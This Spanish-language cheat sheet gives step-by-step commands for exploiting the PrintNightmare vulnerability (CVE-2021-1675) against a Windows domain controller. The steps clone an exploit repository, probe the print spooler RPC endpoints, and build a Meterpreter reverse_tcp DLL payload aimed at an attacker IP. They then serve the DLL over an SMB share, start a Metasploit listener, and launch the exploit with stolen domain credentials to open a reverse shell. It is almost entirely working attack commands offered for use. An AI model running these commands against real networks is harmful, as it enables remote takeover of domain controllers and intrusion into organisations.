# PrintNightmare

1\) Clonación de repositorio.

```shell
git clone https://github.com/cube0x0/CVE-2021-1675.git
```

Revisión si el objetivo es vulnerable.

* Print System Asynchronous Protocol.
* Print System Remote Protocol.

```shell
rpcdump.py @<IP-address-DC> | egrep 'MS-PAR|MS-RPRN'
```

2\) Generación de payload DLL.

```shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-local-port> -f dll > script.dll
```

3\) Creación de recurso compartido.

```shell
smbserver.py -smb2support share script.dll
```

4\) Configuración de listener (multi/handler) de reverse shell.

```shell
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker-IP-address>
set LPORT <listen-local-port>
run -j
```

5\) Ejecución de exploit y obtención de reverse shell.

```shell
CVE-2021-1675.py <ACME.LOCAL>/<user>:<password>@<IP-address-DC> '\\<attacker-IP-address>\share\script.dll'
```